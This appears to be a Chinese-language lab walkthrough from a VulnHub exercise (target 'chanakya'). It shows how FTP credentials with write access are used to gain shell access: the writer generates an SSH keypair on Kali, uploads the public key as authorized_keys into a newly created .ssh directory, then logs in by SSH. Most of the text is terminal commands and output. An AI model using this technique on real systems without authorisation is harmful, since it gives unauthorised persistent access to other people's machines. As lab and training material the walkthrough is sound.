通过FTP获得靶机Shell步骤说明
通过FTP获得靶机Shell步骤说明
当已经获取到FTP的用户名和密码,并且该用户有权限上传文件以及创建文件,那么基于此获取Shell的步骤如下:
1.在Kali Linux上利用ssh-keygen命令创建公私钥文件,并将这些文件移动到工作目录,方便后面通过FTP上传
┌──(root💀kali)-[~/Vulnhub/chanakya]
└─# ssh-keygen
Generating public/private rsa key pair.
Enter file in which to save the key (/root/.ssh/id_rsa):
Enter passphrase (empty for no passphrase):
Enter same passphrase again:
Your identification has been saved in /root/.ssh/id_rsa
Your public key has been saved in /root/.ssh/id_rsa.pub
The key fingerprint is:
SHA256:o3qqxP2XtfrtTqjSSy4k1Ikh5+xRym+dW4MT2aWLHqo root@kali
The key's randomart image is:
+---[RSA 3072]----+
| |
| . o . . |
| * * . o o |
| O o o o |
| o o .S= . |
| . .o +.B.=. |
| o .+.+.B.o. |
| . o=o*..o |
| ..E+.+=+.o+ |
+----[SHA256]-----+
┌──(root💀kali)-[~/Vulnhub/chanakya]
└─# ls -alh
total 120K
drwxr-xr-x 2 root root 4.0K Feb 12 23:09 .
drwxr-xr-x 9 root root 4.0K Feb 12 22:35 ..
-rw-r--r-- 1 root root 100K Feb 12 23:04 ashoka.pcapng
-rw-r--r-- 1 root root 1 Feb 12 23:08 .bash_history
-rw-r--r-- 1 root root 1.2K Feb 12 22:38 nmap_full_scan
-rw-r--r-- 1 root root 12 Feb 12 23:09 test.txt
┌──(root💀kali)-[~/Vulnhub/chanakya]
└─# ls -alh
total 120K
drwxr-xr-x 2 root root 4.0K Feb 12 23:09 .
drwxr-xr-x 9 root root 4.0K Feb 12 22:35 ..
-rw-r--r-- 1 root root 100K Feb 12 23:04 ashoka.pcapng
-rw-r--r-- 1 root root 1 Feb 12 23:08 .bash_history
-rw-r--r-- 1 root root 1.2K Feb 12 22:38 nmap_full_scan
-rw-r--r-- 1 root root 12 Feb 12 23:09 test.txt
-
将id_rsa.pub公钥文件重定向写到authorized_keys文件中
cat id_rsa.pub > authorized_keys -
在靶机的用户家目录,创建.ssh目录,进入该目录
-
上传authorized_keys文件到.ssh目录
ftp> mkdir .ssh 257 "/.ssh" directory created. ftp> cd .ssh 250 "/.ssh" is the current directory. ftp> put authorized_keys local: authorized_keys remote: authorized_keys 200 Active data connection established. 125 Data connection already open. Transfer starting. 226 Transfer complete. 563 bytes sent in 0.00 secs (8.3894 MB/s) ftp> -
修改id_rsa文件权限为400,然后ssh到目标主机
STRIVE FOR PROGRESS,NOT FOR PERFECTION
